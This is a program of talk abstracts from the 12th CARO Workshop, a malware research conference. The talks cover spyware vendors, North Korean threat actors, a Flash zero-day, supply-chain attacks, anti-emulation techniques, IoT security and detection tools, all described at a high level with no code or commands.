The abstracts are listed in sequence of the Workshop program. Changes may be made at any time. Details of the keynotes are here.
FinFisher x Hacking Team = ?
Filip Kafka (ESET), Bill Marczak, John Scott Railton (CitizenLab)
FinFisher and Hacking Team share a number of similarities, both are organizations infamous for developing surveillance tools sold to governments worldwide. They both have been criticized for not being selective about who to sell to – it’s suspected their customers include oppressive regimes. The organizations have both been hacked, with sensitive internal files leaking online, confirming some of the suspicions. It’s for these reasons that both organizations and their malware are the subject of research at ESET and CitizenLab. Our respective research findings have revealed that both companies are still active – developing and selling their malicious tools.
Presentations at Virus Bulletin and AVAR conferences in 2017 detailed technical improvements in the FinFisher toolkit, including a custom virtual machine and cunning infection vector used to install the spyware on computers of targets – through a MitM attack most likely happening at the ISP level. Later on the infection technique remained but the malware was switched to StrongPity 2.
We will examine the similarities and differences with CitizenLab’s March 2018 findings, which uncovered more details in this attack. We’ll present pcaps to support our findings.
Hacking Team’s flagship product, Remote Control System (RCS), was detected in the wild in the beginning of 2018 in fourteen countries. We will present the evidence that suggests that the new post-hack Hacking Team samples can be traced back to a single group. Who is this group, who are their targets, and what is their modus operandi?
SiliVaccine: The Supreme Leader of Anti-Virus Solutions
Mark Lecthik, Michael Kajiloti (Checkpoint)
Meet SiliVaccine – North Korea’s national Anti-Virus solution. SiliVaccine is deployed widely and exclusively in the DPRK, and has been continuously in development by dedicated government teams for over fifteen years. When we heard of this strange software, we were immediately driven to investigate it: it’s not every day that you can catch a glimpse of the malware landscape inside the closed garden of the DPRK’s intranet.
In this talk, we will describe how we were able to obtain a rare copy of the program; how we were able to reverse engineer it; and what surprising discoveries we made about it. We will provide a rare glimpse into the internal workings of this mysterious AV, detailing the program architecture, while highlighting some of its most bizarre & puzzling implementation details.
Taking an in depth look at SiliVaccine’s core components, including the file scanning engine, the system level drivers, and the user mode utilities, allows us to expose what lies behind the scenes, hidden away from the public eye.
At the same time, we will try to uncover the story behind SiliVaccine’s creation, describing the involved entities and the sheer effort that must have gone into developing this product. If there is anything we learned from this research, it’s that DPRK state-sponsored software is a secretive industry full of incredibly shady practices, and that if Kim Jong-Un sends you a free trial of his latest security solution, the correct answer is “thank you but no thank you”.
North Korean defectors and tracking of actors behind
Jaewon Min, Inhee Han (McAfee)
Historically North Korean defectors were victims of cyber attacks for many years. In the past, threat actors used Windows as the main platform to deliver malware to defectors using executable files and office documents, especially Hangul (Korean Word Processor). But threat actors went mobile. We have spotted their mobile operations and tracked what they were doing under the surface hidden from the public eye to successfully implant malware to defectors.
We will present our analysis of 2 threat actors that executed mobile malware operations targeting North Korean defectors.
The Lazarus group is the one of most activate cybercrime groups. We found the activity of the actor in the mobile world. We will explain how we found the activity and what made us reallize that the activity is operated by the Lazarus group. For example, overlapped IP addresses that were used by Laszarus as C2 and code similarities.
Previously unknown group named “Sun Team” has used KakaoTalk, and other SNS services to directly approach defectors and send malware download links. We will explain internal working of the malware samples and how they used cloud services as C2 server. Also we will look into what kind of data were extracted from the victim’s device and infer who were the victims of this operations.
Furthermore, we will present about the artifacts we found from the mobile operation that gave us insight of how they operated under the surface like information gathering, creation of fake accounts, malware development, test device models, data encryption etc.
Exploiting ActionScript3 interpreter
Anton Ivanov, Boris Larin (Kaspersky Lab)
At the end of 2017 we have discovered Adobe Flash Player zero day vulnerability (CVE-2017-11292) which was used in BlackOasis APT. This case demonstrates that Adobe Flash Player still is a good target for threat actors.
CVE-2017-11292 is particularly interesting type-confusion vulnerability, and there is no public reports describing it.
In this presentation we will present and release our self-made ActionScript3 processor module and debug plugin for IDA Pro. This tools work together to complement each other, and shown good results in ITW exploits debugging.
We analyzed AVM and found a way how to increase analysis with the rich possibilities of IDA Pro and API.
In our presentation we will cover next things:
1. What exploitation techniques are used by threat actors now in flash exploits
2. We will make detailed description of CVE-2017-11292
3. Also we will talk about how to find new vulnerabilities in Adobe Flash Player
4. In this presentation we will present our self-made IDA Pro plugins for analysis and debugging of flash exploits.
The Secret Weapons of Andariel Group
Minseok (Jacky) Cha (Ahnlab)
The Andariel group, also known as the Silent Chollima, is one of the subgroups of the notorious Lazarus Group. Unlike other subgroups, this group primarily focused on South Korean targets so it is not as well known in other countries. Surprisingly, this attack group has been active in Korea for over 10 years.
Andariel’s first attack was on the Korean military in 2007 and since then has expanded its attacks to the private sector, such as its DDoS attack in 2009 and the 3.4 DDoS attack in 2011. Andariel is associated with the 2013 DarkSeoul (3.20- cyber terror attack) and was responsible for Operation Black Mine in 2014, exploiting a vulnerability of Active X that is widely used in Korea. After 2015, it stole military secrets by attacking military defense companies, large corporations, and military units in Korea. However, in 2016, there was a change in the pattern of attacks from this group mainly targeting confidential information. The group distributed malware near the end of 2016 where they could view their opponents’ hand while playing a gambling game and in 2017 started an attack on the financial industry and also demanded a ransom from a hacked travel agency. Finally in 2018, they had attempted an attack on a cryptocurrency exchange. Judging from the pattern of unpublished attacks, we can see that they also have interests in various public services and ICT companies of Korea.
The main infection vectors of this group are as below:
– Spear phishing emails with macros
– Watering hole attacks that exploit the vulnerabilities of Active X
– Attacks exploiting the vulnerabilities of antivirus programs and IT management systems used by Korean companies and institutions
– Supply chain attacks tampering with the update files of systems, such as ERP and remote programs
In addition, Andariel is familiar with the vulnerabilities of security programs and central management systems that are widely used in Korea.
Malware analysts investigate malware using information gleaned from its activities, such as its attack target, attack method, malware type, web shell, and C2. Sometimes, however, a malware developer reveals internal information and tools used for development by mistake. And this became key information for malware analysts to profile the attack group. For example, malware with a Korean UI has a high likelihood of having a developer who is native or fluent in Korean.
In this presentation, I will talk to you about Andariel’s activities from 2016 to 2017, focusing on its main attack targets, infection vectors, malwares, and the relation between the code and the attack. I will also reveal some interesting information about Andariel acquired from the internal tool used by the attackers.
Malware is flying under your radar
Kurt Natvig (Forcepoint)
Sandboxing is often seen as the last line of defence for your cyber security. The standard approach is to first check for known threats, then possible threats, non-compliance with corporate policies and so on. If the object passes all these layers of protection and your still not sure what you are dealing with – you put it through a sandbox of choice. The sandbox will try in any automated way possible to activate/detonate the unknown object to help you to categorize and work out how bad it is. Sandbox-services for malware analysis are not created equally. Even though you use your golden image or real physical hardware, sandboxing applications today require them to have access to unknown services through the Internet. The cyber-criminals use this to tap into the virtual environments and store the characteristics of these magical worlds. Sandboxes are too eager to aid & assist because it wants the potential malware to detonate and show its true colour, but instead they help reveal their environments making it possible for the malware to fly under the radar.
Venturing Into the Unknown: Malware Abuse of Undocumented Instructions
Shiv Chand (K7 Computing)
“…there are things we know we know. We also know there are known unknowns; that is to say we know there are some things we do not know. But there are also unknown unknowns – the ones we don’t know we don’t know. And if one looks throughout the history of our country and other free countries, it is the latter category that tend to be the difficult ones” – Donald Rumsfeld, ex-US Secretary of Defense, 12/02/2002
Various families of malware have been actively using undocumented x86/x64 Intel instructions for some time now as one more technique in their anti-emulator, anti-debugging and anti-reversing armoury.
The speed of technological advance has meant that chip manufacturers have implemented new advanced instructions before documenting them in their manuals describing the instruction set. Intel’s manual, for example, has been prepared to aid legitimate software developers rather than malware authors who are keen to leverage unknown unknowns to evade detection. Various malware families have been able to successfully exploit the ensuing knowledge gap before support is provided in emulators, debuggers and disassemblers.
This presentation explores undocumented Intel instructions which are and have been actively used by malware. We shall not only segregate such instructions based on the particular malware family using them and their lineage, but also aim to provide rudimentary documentation for each of them based on our research and observations. We shall also aim to provide a framework for identifying, researching and documenting undocumented instructions for other chipsets such as ARM.
CCleaner incident: Attacking the masses to target the few
Jakub Kroustek (AVAST)
On September 18, 2017, the news broke that CCleaner, one of the most popular PC performance optimization tools, had been infected with malware, impacting 2.27 million users. Avast acquired Piriform, the makers of CCleaner, at the time the attack was happening, and this provided the Avast Threat Labs team an opportunity to directly analyze the attack.
We have discovered the incident was a sophisticated APT attack, designed to target select high-profile technology and telecommunications. By using a supply-chain attack to gain access to the CCleaner build environment, the threat actors injected malicious code into the product, infecting a routine software update that was distributed to CCleaner users. What’s really interesting is that out of the 2.27 million PCs affected, only 40 PCs –ones within those high-profile companies– received a second malicious payload most likely developed for corporate espionage. Indications also included that this attack may be related to the notorious “Axiom” hacking group out of China.
Jakub Kroustek will present the findings that he and the security experts from the Avast Threat Labs team uncovered during the initial and ongoing investigation. He will share details about the inner workings of the attack, discuss who might be behind the breach. He will also briefly discuss why he believes supply-chain attacks will continue and what the security community, software companies and enterprises need to consider to help prevent these attacks.
GreyEnergy: Beyond BlackEnergy and NotPetya
Anton Cherepanov, Róbert Lipovský (ESET)
In our CARO 2017 Workshop talk titled “Rooting out what really happened last December” we introduced Industroyer, the greatest threat against ICS since Stuxnet. We also presented our findings into the operations and toolset of the Telebots APT group (also referred to as Sandworm). We believe this is the same group (or their successor) behind the first ever blackout in history facilitated by an attack using malware, namely BlackEnergy.
In this new talk, we’ll uncover previously undisclosed connections between several APT groups that have been terrorizing critical infrastructure in Ukraine in the past few years but have, in some cases, been active in other countries as well.
Firstly, we will examine the links between the Telebots group and another attack in 2017, which became one of the most damaging cyberattacks in history – the June 2017 ransomware outbreak of NotPetya (also known in the security industry as Petya, ExPetr, Nyetya, EternalPetya). And secondly, we will share previously unpublished details about the NotPetya “cover-up” ransomware, including an early discovered sample which predates the outbreak.
The main focus of the talk will be the introduction of GreyEnergy – a previously unknown malware framework which has been used in attacks against energy companies in Europe, and which we consider to be the successor to BlackEnergy. We will provide a technical analysis of the stealthy modular malware and insight into the tactics, techniques and procedures (TTPs) used by the group behind it.
Not Your Average Prince: Digging into the Nigerian Scam World
Matt Bromiley (Cylance), Courtney Dayter (Kroll)
“Help, I’m a foreign national who has encountered millions of dollars and I need help transferring it!” We’ve all seen the emails – many of us have laughed at them. However, amongst all the silliness is a group of nefarious – and now very wealthy – individuals who still manage to steal millions of dollars. But behind all these attacks are humans – and humans make mistakes. It’s time to reveal these mistakes and put faces to the names.
In this talk, we will examine the various scams that have originated from the Nigerian online crime world, how these scams are conducted, and some of the individuals behind them. Through years of experience investigating and researching these various scams – including Business Email Compromise, Apple scams, Fraudulent Invoices, and the recent surge in Office 365 compromises – we have built up a repertoire of the OPSEC failures that expose the individuals behind the attacks. We have also researched the financial networks utilized by the fraudsters, and how their money moves around the globe.
In our presentation, we will examine the following:
- A technical examination of various attacks originating from the Nigerian online crime world,
- The preferred methods of moving money and financial institutions used by the Nigerian fraudsters,
- OPSEC failures committed by the threat actors that have revealed their true identities, and
- The connections between these individuals that may describe how the attacks are orchestrated.
CARO attendees will receive an unfiltered look into the Nigerian online crime world and the individuals wreaking havoc on bank accounts around the globe. We will be presenting years of research, linkage between individuals and banks, and discussions of how these attacks are perpetrated. Lastly, as we are always seeking to make the world a safer place, we will provide the audience with ideas on protecting against these attacks.
That was close! That was Close! Seeing, Understanding and Changing What Lies Beneath
Adam Shostack
Adam Shostack, Steve Bellovin and collaborators have been exploring what structures we can model on aviation to better learn “what lies beneath” the compromises which plague us, and how we can better expose, understand, and address those root causes. This talk builds on the work Shostack did to push the AutoRun fix to XP and Vista while at Microsoft, and will focus on how to use near-misses to improve our overall knowledge of what goes wrong.
For example, if DNS security measures detect a C2 connection, we could tie that back to a miss by an anti-virus system, or behavioral AV might detect strange C2 connections, missed by DNS. In each case, some controls function as hoped, others do not. Today, we rarely learn from such things for a variety of reasons. This talk will explore those reasons, and suggest both tactical and policy improvements that will help us all defend better.
Evading Detection with Anti-Emulation Techniques
Catalin Valeriu Lita, Doina Cosovan (Scorecard.io)
Anti-malware products started to develop emulators in order to be able to add detection on behavior as well as to be able to bypass obfuscated decryption so that they could add detection on the malware payload after emulating the decryptor code. As a consequence, cybercriminals started to protect their malware samples by developing various anti-emulation techniques.
The most common and basic anti-emulation techniques that emerged are the usage of big loops and rarely used functions. Big loops are used in order to exhaust the number of instructions an emulator can execute while rarely used functions are not implemented in emulators and thus can not be executed by emulators. Generally, any difference between the real and the emulated environments can be exploited as an anti-emulation technique:
– values returned by particular functions for specific sets of parameters,
properties of particular files from disk,
– deliverability of window messages,
– the structure of the PEB,
– the implementation of callbacks for TLS, window creation, exceptions,
– mouse movements,
– register values,
– content of the functions to be called.
We will present the evolution of anti-emulation techniques for 6 malware packers we monitored for updates over the past few years: Bredolab (2009-2010), VIZ (2010-2014), VIZ2 (2013-2015), UPA1 (2013-2015), UPA2 (2015), UPA3 (2013-2015). In most of the monitored packer evolutions, the packer writers started by testing various advanced anti-emulation techniques in the wild. They began with a combination of anti-emulation techniques and improved them over time. Each technique either reached the desired maturity level or was abandoned. In the end, they reached an efficient combination of anti-emulation techniques and settled for that subset out of all the anti-emulation techniques they tried. The reasoning behind this is the fact that they found a small subset which is capable to prevent detection, can be easily updated, and doesn’t draw as much attention as would a piece of code full of anti-emulation techniques. The following are some examples of anti-emulation techniques that managed to remain in the chosen subset for various packers: big loops, integrity checks for some executable files from disk, window messages (such as EM_POSFROMCHAR, EM_SETWORDBREAKPROC, EM_SETEVENTMASK).
In the end, we will present the anti-emulation techniques we discovered in packers used for fresh malware samples from 2018 and compare them to the anti-emulation techniques used a few years ago.
Is My Smart Home Secure?
Ivan Bešina, Milan Fránik, Miloš Čermák, Kacper Szurek, Juraj Bartko (ESET)
Ever more people are connecting new objects to the Internet of Things, even though the security and privacy protections of many of these devices or the services they connect to have been challenged by researches in recent years. The abundance of already discovered shortcomings should have provided the manufacturers of such devices great feedback and the opportunity to improve the security of forthcoming devices. But have they? We decided to take a look at the current level of the security of the IoT devices.
We set up a test lab with various “smart” objects typically used in ordinary households. The selected devices were mainly from international companies, but some were from local players in Central Europe. We picked 20 devices that range from smart plugs, bulbs, motion sensors and cameras, to IoT hubs, smart TVs, weight scales and popular personal assistants. During the research we focused on finding vulnerabilities in cloud communication, user-exposed applications and firmware update processes, but also RF communication with peripheral devices and LAN communication, using standard penetration tools and methods.
In half of all tested devices we uncovered at least one minor issue, such as lack of proper control panel authentication, unencrypted LAN traffic, unnecessary opening of router WAN ports using UPnP, or the possibility to replay RF commands. These alone do not pose major security risks, but combined with other vulnerabilities or bad security practices, can be easily abused by an attacker. Four of the devices had more serious issues. One camera sends its video stream to the cloud with insufficient encryption, leaking private and potentially very sensitive data. By combining a TLS MitM attack and script injection, we were able to alter the firmware of an IoT smart hub, implanting an SSH backdoor. With two other IoT hubs we were able to execute RCE attacks from the internet. By this means we gained full control of these devices and, consequently, over all its connected peripherals including heating controls, surveillance systems and even electronic locks.
Being able to control our smart homes from anywhere is a very attractive possibility, but such systems and capabilities are equally attractive to attackers, so to keep our privacy intact, the security of IoT is crucial. Our research showed that there are still popular IoT devices in the market that have critical security issues. However there are also manufacturers that can and do produce secure enough devices for the time being, showing that designing secure IoT objects is achievable.
Chadron – Android Dynamic Analysis Sandbox
Vojtech Bocek, Nikolaos Chrysaidos (AVAST)
Chadron is our in-house dynamic analysis sandbox for Android applications capable of method tracing, I/O tracing and machine learning feature extraction. It can also evade detection by apps and contains many optimizations to get the most relevant results possible from the analysis.
The sandbox provides detailed results for manual analysis as well as automated machine learning classification. It is built as a scalable solution that we plugged into our automated sample analysis pipeline and it helps detect samples we would have missed without it.
We’ve also integrated Chadron with other services to form a complete solution for Mobile Threat Intelligence – apk.io. This separate service combines results from dynamic and static analysis, machine learning classifiers, traditional AV and more. It provides much useful information to malware analysts, making it much easier to spot malicious behaviour and link samples together.
While mostly invisible to our customers, Chadron & apk.io have become the most useful tool for our analysts since the dynamic analysis often reveals much more than usual methods.
In our talk, we would like to describe how we managed to build Chadron, highlight some of the technical difficulties we encountered and present some of the results it provided during its two years of production use.
PowerShell: An Attacker’s Framework of Choice
Pawankumar Chaudhari, Pushkar Ratnaparkhi (Quick Heal)
PowerShell is highly powerful and it provides full access to system functions like Windows Management Instrumentation (WMI) and Component Object Model (COM) objects. Attackers are increasingly using PowerShell in their attack methods. Latest Microsoft Windows OS by default have PowerShell package and hence it is easy for attacker to exploit victim machines.
Attackers are continuously introducing many advanced techniques through PowerShell like fileless malware, application whitelisting and shellcode injection which becomes difficult to detect and clean by traditional AV solutions.
We will show how PowerShell is weaponized in the attacks that are observed in the wild and then we will look at the detection mechanism. Attackers are extensively using PowerShell from macro malware to exploits.
Cybercriminals also continued to adopt fileless malware leveraging Microsoft PowerShell, which surged rapidly over the last year. We will discuss some case studies on malicious scripts that are hidden inside the registry or Windows Management Instrumentation (WMI) in order to achieve persistence method. We will put a light different lateral movement techniques using PowerShell scripts. Cybercriminals are using these techniques to spread banking Trojans to Cryptominers.
What Lies Beneath: BLE in GPS trackers
Roman Unuchek (Kaspersky Lab)
I analyzed several GPS trackers with Bluetooth Low Energy capabilities and found major security issues. These trackers use BLE to communicate with a user’s phone directly to preserve battery power, instead of uploading data through the SIM card.
Most of these devices use no authentication so anyone can connect to them via BLE, not only the owner.
Once connected they are ready to expose user data to the attacker.
In my presentation, I’ll show what data can be stolen and possible attacks:
– how to trick these trackers and mock their location with fake coordinates
– how to block device communications through other channels
– how to completely break the device
I should mention that not all such devices are vulnerable. Some of them are doing everything right – they have authentication and access control. I’ll describe their techniques to protect user data.
BInsider – automatic signature creation and detection via shared code
Johann Kemper (Avira)
In today’s world of easily available crypting services, it is difficult to judge malware based on the root sample. Using generic unpacking or sandbox systems makes it easier to access the code behind these packers but still leaves a lot of work to the researcher to classify samples and create detection. Additionally through leaks or “underground” communities, a lot of malicious source code examples make it possible to create powerful malware without any actual knowledge of it.
By intelligently disassembling memory dumps while reconstructing the different code functions and their control flow graphs, BInsider takes advantage of this shared code to recognize similar traits between samples and classifies them. This presentation will take us through the different technologies that I used to create this Project and how they enable BInsider to automatically create signatures of a new sample in milliseconds.
12th international CARO Workshop 